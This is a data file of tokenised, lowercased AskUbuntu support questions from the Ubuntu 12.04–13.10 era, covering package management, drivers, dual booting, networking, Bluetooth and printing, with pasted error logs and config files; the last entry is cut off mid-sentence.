418158	compiled packages and apt-get mess	due to my work i have to use the last version of gdb ( 7.7 ) which is not provide in the ubuntu repositories . for that purpose i download the source code , compiled it and installed it successfully . my question comes with the fact that apt does not know that i am using that version of gdb so whenever there is an small update it will downgrade gdb to the version which is existing in the repositories . in short , i wonder how should i deal to get two version in my system of the same package , one the older version from the repository , and the new version from the compiled source code . i am using ubuntu 12.04 64 bits . thanks ! !
418159	apt-get install and apt-get update not working	whenever i am trying to install any application i 'm getting the following error : root @ utkarsh-hp-pavilion-g6-notebook-pc : / # apt-get install gksu reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gksu and whenever i try sudo apt-get update i get the following error : root @ utkarsh-hp-pavilion-g6-notebook-pc : / # sudo apt-get update get:1 http : //download.virtualbox.org saucy inrelease 100 % [ 1 inrelease gpgv 3,435 b ] [ waiting for headers ] [ connecting to archive.casplitting up /var/lib/apt/lists/partial/download.virtualbox.org_virtualbox_debianign http : //download.virtualbox.org saucy inrelease e : gpg error : http : //download.virtualbox.org saucy inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) i replaced sources.list file with a new one generated from this site : http : //repogen.simplylinux.ch/ i removed all files having 'google ' or 'chrome ' in their names from sources.list.d i also uninstalled chrome still the problem persists . please help .
418161	which one to install first when dual boot windows 8.1 and ubuntu 13.10 ?	i want to make ubuntu and windows dual boot.now which one i should install first ?
418162	live usb on multiple disks	i currently use ubuntu gnome 13.10 on a usb drive as a backup os , but i have a question that i have n't been able to find the answer too yet , would it be possible to have a live usb ( or install to usb ) spread over several drives ? i also always have an abundance of sd cards , could i load 3 or 4 in an sd card reader and have a multi disk live usb ? would the performance improve ? what 's the best way to go about it ? thanks
418164	compiz window switchers seem not to take effect	none of the compiz window switchers ( e.g . the ring switcher ) take effect , even after choosing to 'resolve conflicts ' when enabling them . the default switcher takes effect no matter which switcher is enabled in compiz . ubuntu 13.10 upgraded from 13.04 . nothing really tinkered with in compiz other than installing the compiz extras with apt-get and enabling the cube switcher , which also does n't seem to show up at all . this is the first time i have tried configuring compiz for getting the cube and nifty switchers , so maybe there 's something obvious i should do that i have n't . i installed compiz config only after the upgrade to 13.10 .
418166	suspend or turn screen off when logged out - ubuntu 13.10	when i am logged in to my ubuntu 13.10 desktop , the power settings and brightness & lock settings are applied properly . when i log out , my monitors stay on and the computer never suspends . i would like to be able to adjust the power settings for this logged out state . thanks for your help . i would think that there is either an easy solution for this problem or a lot of people annoyed by it ! p.s . - the only questions i 've been able to find about this are out of date ( automatically suspend if no one is logged in for 30 minutes ) or unanswered ( why my monitor never shuts down when on the logging screen ( ubuntu 13.10 ) ? ) .
418167	how often is the lubuntu cd download image updated ?	i want to use a lubuntu 12.04 live cd for online banking but wonder how often i will need to check the lubuntu download page to ensure i am using the most up to date cd image so i have the latest updates .
418168	network manager auto-connect to wifi-network fails	network manager ( nm ) does not auto-connect to a configured wifi-network ( e.g . `` net-a '' ) after upgrade from 13.04 to 13.10 . before the upgrade nm auto-connected to the pre-configured wireless network ( net-a ) . now you have to manually connect to the configured wifi-network ( net-a ) . after manual connect , the network performes normal .
418169	uninstall samba , restore previous ubuntu permissions	i am a newbie ubuntu user in over my head ! i am dual booting windows 7 ( sda2 ntfs ) and ubuntu 12.04 ( sda6 ext4 ) . i have a dual ssd ( sda ) and hdd ( sdb ) set up . i keep both os 's and all programs on the ssd , all of my media ( and preferably all libraries for both systems ) are on my hdd . i had all of the permissions as such so i could read/write all files/directories on my hdd ( sdb1 ) from both systems without root user privileges . i wanted to access my hdd from my android device , so i followed these instructions to install and configure samba : http : //www.maketecheasier.com/install-and-configure-samba-in-ubuntu-for-file-sharing i followed the instructions given and now the ownership and permissions on all of my drives ( sda and sdb ) are changed to root . i have now uninstalled samba via the ubuntu software center . however i am not able to change ownership on my hdd ( sdb ) back to myself ! i have tried : sudo nautilus i get : sorry , could not change the owner of `` sdb1 '' : error setting owner : read-only file system can anyone help me restore my permissions to before my samba experiment ?
418170	install kdevelop on ubuntu 13.04	kdevelop has a new release 4.6 http : //kdevelop.org/46/kdevelop-460-final-released i would like to install this on ubuntu 13.04 ( or ubuntu 13.10 if that would be easier ) the proper way to install package on ubuntu is using apt-get . so i tried : sudo apt-get install kdevelop unfortunately this installs kdevelop 4.5 . on the kdevelop site are a huge list of instructions . error prone and time consuming . http : //techbase.kde.org/kdevelop4/howtocompile can kdevelop 4.6 be installed using apt-get ? if so , how ?
418171	set desktop background from command line over ssh	i am attempting to set my desktop background from the command line in ubuntu 12.04 . i am able to do this from the terminal on the actual machine as described here . gsettings set org.gnome.desktop.background picture-uri file : ///path/to/my/image.png however when i login to the machine over ssh and run the same command , i am presented with the following error : ben @ base : ~ $ gsettings set org.gnome.desktop.background picture-uri file : ///path/to/my/image.png ** ( process:19940 ) : warning ** : command line `dbus-launch -- autolaunch=ca5602075c1f96df6beebf670000000b -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n ** ( process:19940 ) : warning ** : command line `dbus-launch -- autolaunch=ca5602075c1f96df6beebf670000000b -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n how can i set the desktop over ssh ?
418172	shutter - wait until menu dissapear	i 'm using gnome shell and i have difficulties with shutter . when i want to take a screenshot , i open menu in upper panel , but i also get that menu in my screenshot . is there any chance that shutter waits until menu dissapears , and then make a screenshot .
418174	unable to mount windows usb	so i tried to make a bootable windows 8.1 usb , when i did that and plugged the usb into the usb port i got this message : unable to mount windows usb error mounting : mount exited with exit code 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdc1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . what should i do now ? i ca n't boot the windows 8 and i ca n't even reach my files ... . sorry for my bad english , i 'm from lithuania so ...
418177	ca n't install ubuntu 13.10 64bit at dell vostro 3360-0309	i try to install ubuntu - it does n't `` see '' hdd or partitions at all . what i have : laptop with 13 and 4gb ram windows 7 home premium , need to save it . i 've made a separate primary partition with ext4 file system , 60gb . how i initiate installation boot from usb , ubuntu 13.10 amd64 , downloaded from official site . choose `` test ubuntu '' , then try to install choose `` install ubuntu '' the result is the same - to hdd or partitions in the list , when i need to choose location . please , help ! p.s . dell+ubuntu cooperate closely , but what 's wrong here ? this leads to users loss a lot , ca n't you test such typical cases ? !
418178	ubuntu will not leave 2d mode	i am running 12.04 lts , have received all of the updates , and can not switch back to 3d mode . after restarting and notifying the gui that i would like to start in ubuntu ( 3d ) mode , it goes to 2d mode anyway . the only recent changes i 've performed are installing 1 ) updates and 2 ) dropbox . i 've tried disabling dropbox without success , so i doubt that it is the culprit . i 've tried various other re-installs for the drivers . as a note , the gui for additional drivers is blank ( and suspiciously so ) , whereas previously i had an ati driver . an image of the blank gui is below , because i recall there were tabs and so forth in it , but none are visible : i 've reinstalled the flgx drivers and similar drivers and followed these instructions . no success . are there any other suggestions ? note , my graphics driver is integrated ati radeonâ˘ hd 4250 gpu as part of an asus m4a88t-m note : /usr/lib/nux/unity_support_test -p x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 135 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 22 current serial number in output stream : 22
418179	xrdp mount cd manually	i am running ubuntu 12.04.4 lts 64 bit i work through remote connection using xrdp . the problem is when i connect remotely i can not access cd/dvd drive but i can see the icon in nautilus . when i click it i have error saying mount failed i need every time to mount it manually using command line sudo mount /dev/sr0 /media/cd and when i mount it from remote connection , the console session can not access the cd . the error is saying permission denied . maybe because of the sudo command i used in remote connection how can i read my cd from both console and remote sessions without manually mounting it .
418182	server name change but postfix and dovecot still have ghost of old server name	we built a new 12.04 server in cloud environment with new name . setup postfix/dovecot and opendkim for custom application . we flipped the new server into production and changed the name from mysite2.com to mysite.com . in the log we still see some messages trying to go to root @ mysite2.com i had some duplicate users in the /etc/shadow and /etc/group files but i believe i got them out . any ideas ?
418184	installing ubuntu with windows 8 ( preinstalled ) ?	i have a hp pavilion 15-n004tx laptop ( 4th gen c i5 , 4gb ram , 500gb hard-disk , graphics processor : amd radeon hd 8670m w/ 1gb ddr3 ) . i tried to install ubuntu 12.04.4 by usb and cd , but when installation completes and it gives me the option to restart , it reboots directly into windows 8 . i tried to use easybcd software also but it fails to do any good . although it adds an ubuntu option in the boot menu , when i select it the system restarts and grub command line opens . when i try the ubuntu option it says `` you are running on low graphics '' . i have tried sudo apt-get install fglrx but it does not do any good . how do i install ubuntu alongside windows 8 ?
418186	install windows7	i had windows7 when i bought my laptop . however , because i want to learn about linux and ubuntu so i decided to install to ubuntu 13.10 in my laptop ; but i accidentally overwrote my windows7 as well . i wonder if there is a way to download windows7 image to create a cd or usb bootable from ubuntu ? i search many websites but seem cant not find a way to solve the problem yet .
418192	error : no such device : grub rescue > when ubutu is intalled on pendrive	i have installed ubuntu 13.10 on my pendrive . i have windows 7 installed on c drive of my hard disk . when i start the computer without connecting pendive to system i am getting this error message 'no such device . entering rescue mode ' . but if pendrive is connected to system while start up everything works fine , i get a screen where i can choose os . is there anyway that i can keep ubuntu on my pendrive and use it whenever required without having it be connected on every system startup .
418195	video problems on 13.10 after upgrade from 13.04	i hope to find some help here : - ) my desktop computer is an older hp core2 with an intel i915 video card/chipset . this was working well under ubuntu 13.04 32bit . i have recently updated this system to ubuntu version 13.10 . since the update , the system is slow compared to before . when running `` top '' i constantly see `` compiz '' using a lot of processor which pointed me to investigate the video setup - only as far as i know how to do this . the graphics card is reported as `` gallium 0.4 on llvmpipe ( llvm 3.3 , 128 bits ) '' and for all i can read , this seems to be wrong and might be the core of the problem ? /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.3 , 128 bits ) opengl version string : 2.1 mesa 9.2.1 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no sudo lshw -c video *-display description : vga compatible controller product : 82q33 express integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : fdf00000-fdf7ffff ioport : ff00 ( size=8 ) memory : d0000000-dfffffff memory : fdc00000-fdcfffff
418197	problem with scribblenauts using playonlinux	i have a problem with scribblenauts using playonlinux . so i turn on scribblenauts , i have my first mission , and i click any buttons and immediately turns off . can you help
418198	unity 's `` file edit view '' menus in gnome fallback in ubuntu 12.04 ?	i was recently playing around with ubuntu 11.04 ( ah , the last version of ubuntu to use gnome 2 in the background ) and i noticed this : as you can see its the `` unity '' `` file edit view ... '' menu in gnome 2 . it 's available as an indicator addon in 11.04 . now what i 'm asking is how do i get this integrated menu to the top bar in gnome fallback/classic in ubuntu 12.04 ? as it will be a great addition on my custom distro . its also good for saving space on smaller screens like on my netbook . ( wink wink , nudge nudge . hmm , maybe thats why he wants the answer ) it would also be nicer if it hid when the mouse is n't over it , but that 's just a perk , but it would be nice ; ) i can confirm that the answer by tabakisp works ! thank you tabakisp !
418199	teamspeak3 runscript.sh doesn t work	i have trouble with install teamspeak3-client-linux_x86-3.0.13.1.run after some googling i did all requirments but when i click the ts3client_runscript.sh nothing happens ... how can solve that problem ? thanks
418200	graphics and sound !	how do you change the graphical settings such as the 3d effects on the display for windows etc . also my laptop has 4 speakers but it seems only 2 are being used ... is there any way to fix this ? thanx
418202	no thunderbird sound	xubuntu 13.10 thunderbird 24.2.0 this is my configuration , after i copied the file message.ogg from /usr/share/sounds/ubuntu/stereo/ to ~/music :
418203	able to connect to college wifi network but not able to access internet	my college has captive portal and i am able to connect to the network but not able to access internet . i have tried everything but nothing works . here are my details : c.e.t type : 802-11-wireless status : connected system name : wlan0 ipv4 address : 172.17.5.137 connection speed : 36mbit/s mac address : 68 : a3 : c4 : cb:09:5e access point ( ssid ) : cet signal strength:59 % ; channel:1 ( 2412 mhz ) security : wep
418205	unable to access bsnl-3g after installing sakis3g for ubuntu 13.10 . kindly help me	ubuntu 13.10 is installed on my dell inspiration 15 - 3537 laptop . bsnl usb modem has software lw273v1.2 and hardware u302_m343_p1_v1.0 . ubuntu unable to detect modem and i am unable to access the internet after installing sakis3g . kindly help me .
418208	steam fails to launch . ca n't identify problem or solution	been searching through linux and steam forums for a solution to the problem of steam not starting . it seems like many others are experiencing similar if not identical problems , but i ca n't seem to find a definitive answer to what 's actually wrong , let alone a solution . i am not 100 % sure if the problem i face is the same as many of the other similar questions and threads i 've gone through , so i wanted to see if anyone could shed some light on the issue . i 've listed the terminal output when i try to launch steam , i 'm not a particularly advanced linux user so a lot of it is over my head . i know steam did work previously for me , most likely before the 13.10 ubuntu update , but i ca n't be sure . at least , i would just like to be able to identify the problem . system info : running ubuntu 13.10 32-bit on a dell inspiron 1525 memory : 2.5 gib processor : intel pentium ( r ) dual cpu t2390 @ 1.86ghz x 2 graphics : intel 965gm x86/mmx/sse2 terminal output : ~ $ steam running steam on ubuntu 13.10 32-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) unlinked 0 orphaned pipes gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) [ 0208/174711 : warning : proxy_service.cc ( 646 ) ] pac support disabled because there is no system implementation fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) generating new string page texture 2 : 48x256 , total string texture memory is 49.15 kb generating new string page texture 3 : 256x256 , total string texture memory is 311.30 kb installing breakpad exception handler for appid ( steam ) /version ( 1364601080_client ) generating new string page texture 5 : 128x256 , total string texture memory is 442.37 kb generating new string page texture 6 : 32x256 , total string texture memory is 475.14 kb generating new string page texture 7 : 384x256 , total string texture memory is 868.35 kb adding license for package 0 adding license for package 294 adding license for package 500 adding license for package 1290 adding license for package 1465 adding license for package 2208 adding license for package 2414 adding license for package 4314 adding license for package 4451 adding license for package 4542 adding license for package 4819 adding license for package 6393 adding license for package 7209 adding license for package 8041 adding license for package 8450 adding license for package 8451 adding license for package 8453 adding license for package 8462 adding license for package 8878 adding license for package 11071 adding license for package 11077 adding license for package 11135 adding license for package 11684 adding license for package 11793 adding license for package 11982 adding license for package 12225 adding license for package 12456 adding license for package 12521 adding license for package 13391 adding license for package 13602 adding license for package 13624 adding license for package 13632 adding license for package 13670 adding license for package 13883 adding license for package 14188 adding license for package 14290 adding license for package 14521 adding license for package 14633 adding license for package 14683 adding license for package 14695 adding license for package 14759 adding license for package 14840 adding license for package 15055 adding license for package 15606 adding license for package 15638 adding license for package 15818 adding license for package 16020 adding license for package 16342 adding license for package 16360 adding license for package 16373 adding license for package 16521 adding license for package 16523 adding license for package 16549 adding license for package 16560 adding license for package 16610 adding license for package 16615 adding license for package 16699 adding license for package 16831 adding license for package 16920 adding license for package 17078 adding license for package 17523 adding license for package 17607 adding license for package 17941 adding license for package 18120 adding license for package 18265 adding license for package 18613 adding license for package 18619 adding license for package 18629 adding license for package 18773 adding license for package 18856 adding license for package 25516 adding license for package 25597 adding license for package 25820 adding license for package 26218 adding license for package 26358 adding license for package 26375 adding license for package 26620 adding license for package 26928 adding license for package 27173 adding license for package 27227 adding license for package 27557 adding license for package 27576 adding license for package 27693 adding license for package 27835 adding license for package 28596 adding license for package 28641 adding license for package 28830 adding license for package 28886 adding license for package 30200 adding license for package 30219 adding license for package 30542 adding license for package 30616 adding license for package 31791 adding license for package 32025 adding license for package 36510 adding license for package 36673 adding license for package 38202 roaming config store loaded successfully - 506 bytes . migrating temporary roaming config store generating new string page texture 8 : 512x256 , total string texture memory is 1.39 mb generating new string page texture 9 : 24x256 , total string texture memory is 1.42 mb ( steam:11801 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:11801 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:11801 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:11801 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:11801 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:11801 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:11801 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:11801 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:11801 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:11801 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:11801 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:11801 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . unlinked 2 orphaned pipes casynciomanager : 0 threads terminating . 0 reads , 0 writes , 0 deferrals . casynciomanager : 139112 single object sleeps , 0 multi object sleeps casynciomanager : 0 single object alertable sleeps , 1 multi object alertable sleeps [ 2014-02-08 17:47:00 ] startup - updater built mar 29 2013 11:40:39 [ 2014-02-08 17:47:00 ] opted in to client beta 'publicbeta ' via beta file [ 2014-02-08 17:47:00 ] verifying installation ... [ 2014-02-08 17:47:01 ] verification complete shutting down . . . [ 2014-02-08 17:47:40 ] shutdown
418211	how to install trust webcam on ubuntu 12.04	my trust wb-1400t webcam does not work on ubuntu 12.04 . i 've tried using cheese & skype but nothing seems working . can anyone help me on this please ? ? thank you in advance !
418213	how to maintain an icon for a file , when i move that file from a device to another	i wonder if it is possible to maintain an icon associated with a file , when i copy that file from my hdd to an external device ( e.g. , usb , external hdd , etc. ) . in particular , when i want to `` rank '' a file i follow the procedure : right click on that file → properties → left click on the image in the upper-left side of the window → then i select an icon . however , when i copy that file from my hdd to my usb device , the icon disappears , and i loose my evaluation of that file . do you know if it is possible to maintain an associated icon to a file ? more generally , is there any package or simple method to permanently associate an icon to a file ?
418215	error with canon imageclass d480 driver in ubuntu 12.04 x64	after installing libglade2 i was able to get the cannon drivers to install per the instructions : dpkg -i cndrvcups-common_2.70-1_amd64.deb dpkg -i cndrvcups-ufr2-us_2.70-1_amd64.deb /usr/sbin/lpadmin -p lisas_printer -m cncupsd490zs.ppd -v lpd : //192.168.1.150/lisas_printer -e then when i print a test page from the printer properties window under ubuntu , i see the following status : idle - src = libcanon_pdlwrapper.c , line = 514 , err = 0짜ndebug : pid 2262 ( pdftops ) exited with no errors . i have tried removing and reinstalling , updating the system files , and am not sure how to dig into cups to debug further . i am sure others must be encountering the same problem if you have a canon printer . thanks in advance for any insights you can share .
418216	mouse not working after interrupted ubuntu update	i was updating ubuntu and my pc froze . i rebooted using the power button . ( not the best of ideas , i know , but nothing else was working , except the mouse . ) now , whenever i log onto ubuntu , my mouse wo n't work . ( it still works in windows , though . ) any idea what to do , please ?
418220	ubuntu 12.04 - installing php with -fastcgi	does anyone know how to install php on ubuntu with fastcgi enabled ? i 've installed my php from the following site : http : //www.dev-metal.com/how-to-setup-latest-version-of-php-5-5-on-ubuntu-12-04-lts/ i 've looked into installing fastcgi via ( apt-get install libapache2-mod-fastcgi ) and have come up with the following error : the following packages have unmet dependencies : libapache2-mod-fastcgi : depends : apache2.2-common ( > = 2.2.4 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i 've hit the wall on this without any solutions , am running the latest apache version 2.4 , could use some help on this . thanks .
418221	changing icon theme wo n't apply 100 %	for example , if i change default ubuntu unity 12.04 icons for potenza or awoken ones , seamonkey browser stays the same , i checked that those themes do have seamonkey icon in their sets .
418224	bluetooth : pairing two ubuntu 13.10 machines for audio streaming fails	i 'm trying to stream audio over bluetooth from my laptop to my nas . both run ubuntu 13.10 . i have so far successfully streamed music form three different android phones to the nas . the nas pair 's with android devices without any configuration , i have however changed the device class to 0x200414 ( obtained from http : //bluetooth-pentest.narod.ru/software/bluetooth_class_of_device-service_generator.html ) which is an audio device class . when trying to pair the two ubuntu machines using the gui i get the message : 'konfiguration von `` nas '' ist gescheitert ' ( 'configuration of 'nas ' failed ' ) . below is the logfile of the nas ( 00:1e:10:00:14 : f6 ) : feb 8 18:43:32 nas bluetoothd [ 6902 ] : bluetooth daemon 4.101 feb 8 18:43:32 nas bluetoothd [ 6902 ] : starting sdp server feb 8 18:43:32 nas bluetoothd [ 6902 ] : dis can not start : gatt is disabled feb 8 18:43:32 nas bluetoothd [ 6902 ] : failed to init deviceinfo plugin feb 8 18:43:32 nas bluetoothd [ 6902 ] : failed to init proximity plugin feb 8 18:43:32 nas bluetoothd [ 6902 ] : failed to init time plugin feb 8 18:43:32 nas bluetoothd [ 6902 ] : failed to init alert plugin feb 8 18:43:32 nas bluetoothd [ 6902 ] : failed to init thermometer plugin feb 8 18:43:32 nas bluetoothd [ 6902 ] : failed to init gatt_example plugin feb 8 18:43:32 nas bluetoothd [ 6902 ] : bluetooth management interface initialized feb 8 18:43:32 nas bluetoothd [ 6902 ] : input-headset driver probe failed for device bc : f5 : ac:60 : ba : a4 feb 8 18:43:32 nas bluetoothd [ 6902 ] : input-headset driver probe failed for device 08:37:3d:06:8f:10 feb 8 18:43:32 nas bluetoothd [ 6902 ] : adapter /org/bluez/6902/hci0 has been enabled feb 8 18:43:32 nas bluetoothd [ 6902 ] : unknown command complete for opcode 19 feb 8 18:43:32 nas bluetoothd [ 6902 ] : endpoint registered : sender=:1.246 path=/mediaendpoint/hfpag feb 8 18:43:32 nas bluetoothd [ 6902 ] : endpoint registered : sender=:1.246 path=/mediaendpoint/hfphs feb 8 18:43:32 nas bluetoothd [ 6902 ] : endpoint registered : sender=:1.246 path=/mediaendpoint/a2dpsource feb 8 18:43:32 nas bluetoothd [ 6902 ] : endpoint registered : sender=:1.246 path=/mediaendpoint/a2dpsink feb 8 18:44:18 nas bluetoothd [ 6902 ] : no agent available for request type 0 feb 8 18:44:18 nas bluetoothd [ 6902 ] : btd_event_request_pin : operation not permitted and the laptop ( d0 : df:9a : b5:81 : d5 ) : feb 8 18:43:36 laptop bluetoothd [ 10747 ] : bluetooth daemon 4.101 feb 8 18:43:36 laptop bluetoothd [ 10747 ] : starting sdp server feb 8 18:43:36 laptop bluetoothd [ 10747 ] : dis can not start : gatt is disabled feb 8 18:43:36 laptop bluetoothd [ 10747 ] : failed to init deviceinfo plugin feb 8 18:43:36 laptop bluetoothd [ 10747 ] : failed to init proximity plugin feb 8 18:43:36 laptop bluetoothd [ 10747 ] : failed to init time plugin feb 8 18:43:36 laptop bluetoothd [ 10747 ] : failed to init alert plugin feb 8 18:43:36 laptop bluetoothd [ 10747 ] : failed to init thermometer plugin feb 8 18:43:36 laptop bluetoothd [ 10747 ] : failed to init gatt_example plugin feb 8 18:43:36 laptop bluetoothd [ 10747 ] : bluetooth management interface initialized feb 8 18:43:36 laptop bluetoothd [ 10747 ] : input-headset driver probe failed for device 08:37:3d:06:8f:10 feb 8 18:43:36 laptop bluetoothd [ 10747 ] : adapter /org/bluez/10747/hci0 has been enabled feb 8 18:43:36 laptop bluetoothd [ 10747 ] : unknown command complete for opcode 19 feb 8 18:43:36 laptop bluetoothd [ 10747 ] : endpoint registered : sender=:1.58 path=/mediaendpoint/hfpag feb 8 18:43:36 laptop bluetoothd [ 10747 ] : endpoint registered : sender=:1.58 path=/mediaendpoint/hfphs feb 8 18:43:36 laptop bluetoothd [ 10747 ] : endpoint registered : sender=:1.58 path=/mediaendpoint/a2dpsource feb 8 18:43:36 laptop bluetoothd [ 10747 ] : endpoint registered : sender=:1.58 path=/mediaendpoint/a2dpsink feb 8 18:43:52 laptop bluetoothd [ 10747 ] : discovery session 0x7f79ea8a5650 with :1.116 activated feb 8 18:43:53 laptop bluetoothd [ 10747 ] : unknown command complete for opcode 37 feb 8 18:43:53 laptop bluetoothd [ 10747 ] : unknown command complete for opcode 37 feb 8 18:44:29 laptop bluetoothd [ 10747 ] : stopping pairing the devices using bluetooth-agent and a fixed pin , works hoever there seems to be a problem with pulseaudio now : feb 8 19:44:29 laptop pulseaudio [ 2035 ] : [ pulseaudio ] module-bluetooth-device.c : default profile not connected , selecting off profile
418225	how do i resolve a `` 'python-uno ' has no installation candidate '' error ?	i had a script , it is working with the package python-uno on ubuntu 12.04 lts . the script is in python language and work with ooo to edit xls files . now i upgraded to 13.10 and it seems the uno not working on this release . is there any other solution that work like python-uno ? or how can i know when the uno will be available for 13.10 ? ! update : i upgraded this ubuntu server with 'do-release-upgrade ' and after update i got 'cant import uno package ' in logs so tried to install python-uno from command line and i show this message : peiman @ digidoc : ~ $ sudo apt-get install python-uno [ sudo ] password for peiman : reading package lists ... done building dependency tree reading state information ... done package python-uno is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libreoffice-script-provider-python e : package 'python-uno ' has no installation candidate
418227	default sudo settings did not require password	this is for a 12.04 ec2 instance . in the man pages it says the default should be to require a password when using sudo . i thought by setting the ubuntu 's account password ( in case it was n't set ) that might start prompting me for a password when using sudo , but when i used the passwd command it required me to enter the original password before allowing me to change it . so , even though it appeared to be set already , it was n't prompting me for a sudo pass , and after i used sudo to override and change the ubuntu account password , it still is not asking for a sudo pass . anyway , i 'm not sure how important those details actually are . here is my sudoers file : # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d in all the examples i 've come across where people did n't know why they had passwordless sudo setup , it seemed to be because of some sort of explicit `` nopasswd : all '' line in the sudoers file ( which mine does n't have ) . i tried doing : % admin all : ( all ) passwd : all but it did n't help . id output : uid=1000 ( ubuntu ) gid=1000 ( ubuntu ) groups=1000 ( ubuntu ) ,4 ( adm ) ,20 ( dialout ) ,24 ( cdrom ) ,25 ( floppy ) ,29 ( audio ) ,30 ( dip ) ,44 ( video ) ,46 ( plugdev ) ,110 ( netdev ) ,111 ( admin )
418228	html does n't show php script on uuntu 12.04 ( php5 , apache2 , mysql ) all are installed properly	but info.php in /var/www/ does show the info . only php embedded in html does n't show the script . please help me.. i have tried the previous askubuntu questions and didnot get anything useful so please do n't delete the question
418230	hash sum mismatch when running updates	first of all , please do not label as a duplicate , because out of all of the previous questions with this title , none of the listed fixes worked ! i am having this problem with two fresh installs of ubuntu . 13.10 , which i removed from my system after none of the listed fixes worked , and 12.04 , which none of the previously listed fixes are working . when i run sudo apt-get update & & sudo apt-get dist-upgrade , i get w : failed to fetch bzip2 : //var/lib/apt/lists/partial/mirror.hmc.edu_ubuntu_dists_precise-updates_main_source_sources hash sum mismatch i have tried changing servers and deleting /var/lib/apt/lists/* and nothing has worked . any ideas would be great !
418231	ubuntu can not see nvidia 730m	i have bought a new asus ux302lg and trying hard to install linux on it . the laptop has 3 screen options in hardware ( hdmi , minidisplayport , and build in laptop screen ) the to external ports works , but the laptop screen does not work . ubuntu doenst recognize the nvidia 730m , but if i do a lspci i get the following : 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 00:03.0 audio device : intel corporation device 0a0c ( rev 09 ) 00:04.0 signal processing controller : intel corporation device 0a03 ( rev 09 ) 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) 00:1c.1 pci bridge : intel corporation lynx point-lp pci express root port 2 ( rev e4 ) 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) 00:1c.4 pci bridge : intel corporation lynx point-lp pci express root port 5 ( rev e4 ) 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) 00:1f.6 signal processing controller : intel corporation lynx point-lp thermal ( rev 04 ) 02:00.0 unassigned class [ ff00 ] : device 1aea:6601 03:00.0 network controller : intel corporation wireless 7260 ( rev 6b ) 04:00.0 3d controller : nvidia corporation gk208m [ geforce gt 730m ] ( rev a1 ) what can i do to make the the graphic card avaliable ? i think it 